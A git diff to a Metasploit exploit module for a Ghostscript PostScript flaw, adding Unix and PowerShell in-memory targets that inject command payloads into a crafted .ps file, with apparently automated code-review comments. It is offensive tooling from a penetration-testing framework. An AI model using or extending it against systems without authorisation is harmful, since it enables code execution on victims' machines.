diff --git a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb
index 1a2a12fcd6..bd31e5ca6f 100644
--- a/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb
+++ b/modules/exploits/multi/fileformat/ghostscript_failed_restore.rb
@@ -42,13 +42,23 @@ class MetasploitModule < Msf::Exploit
       'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
       'Privileged' => false,
       'Targets' => [
-        ['PS file', template: 'msf.ps']
+        ['Unix (In-Memory)',
+          'Platform' => 'unix',
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_memory,
+          'Payload' => {'Space' => 4089, 'DisableNops' => true} # 4096 total
+        ],
+        ['PowerShell (In-Memory)',
+          'Platform' => 'win',
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Type' => :psh_memory
+        ]
       ],
       'DefaultTarget' => 0
     ))
 
     register_options([
-      OptString.new('FILENAME', [true, 'Output file', 'msf.pdf']) # Fake PDF
+      OptString.new('FILENAME', [true, 'Output file', 'msf.ps'])
     ])
   end
 
@@ -59,17 +69,18 @@ class MetasploitModule < Msf::Exploit
     sploit.sub!(PLACEHOLDER_STRING, Rex::Text.rand_text_alphanumeric(8..42))
 
     # Replace our test payload with the real one
-    case payload.arch.first
-    when ARCH_CMD
+    case target['Type']
+    when :unix_memory
       sploit.sub!(PLACEHOLDER_COMMAND, payload.encoded)
-    when ARCH_X86, ARCH_X64
-      # Futureproof in case unix gets x{86,64}
-      if payload_instance.platform_to_s == 'Windows'
-        sploit.sub!(
-          PLACEHOLDER_COMMAND,
-          cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
-        )
+    when :psh_memory
+      psh = cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true)
+
+      # XXX: Payload space applies to the payload, not the PSH command
+      if psh.length > targets[0].payload_space
+        fail_with(Failure::BadConfig, 'Please choose a smaller payload')
       end
+
+      sploit.sub!(PLACEHOLDER_COMMAND, psh)
     end
 
     file_create(sploit)
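Review bot: The new PowerShell target declares no `'Payload'` space of its own, so the length budget it is checked against in the next hunk has to be read from a sibling entry (`targets[0].payload_space`); if the target list is reordered or a target is inserted, that check silently picks up the wrong value. Hoist the budget to a module constant, e.g. `COMMAND_SPACE = 4089 # 4096 total`, use it in the Unix target's `'Space'` and in the PowerShell length check, so both targets share one source of truth. The `# 4096 total` comment should also say where the 4096 limit comes from (presumably the template's string buffer, but that is not visible here) and what the 7 reserved bytes account for. The enclosing `initialize` starts before the hunk.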
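Review bot: `psh.length` counts characters while `payload_space` is a byte budget; the two agree only as long as the command `cmd_psh_payload` returns is pure ASCII, so the guard should compare bytes, `if psh.bytesize > targets[0].payload_space`, which states the intent and stays correct for any encoding. The `case target['Type']` has no `else` branch, so a target whose `'Type'` matches neither symbol leaves `PLACEHOLDER_COMMAND` in the generated file; add `else` with `fail_with(Failure::NoTarget, "Unsupported target type: #{target['Type']}")` so the mismatch is reported instead of producing an inert file. Reading the budget through `targets[0]` rather than the current target is fragile for the reason raised on the first hunk. The enclosing `exploit` method begins before and ends after this hunk.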
@@ -77,7 +88,7 @@ class MetasploitModule < Msf::Exploit
 
   def template
     File.read(File.join(
-      Msf::Config.data_directory, 'exploits', 'ghostscript', target[:template]
+      Msf::Config.data_directory, 'exploits', 'ghostscript', 'msf.ps'
     ))
   end
 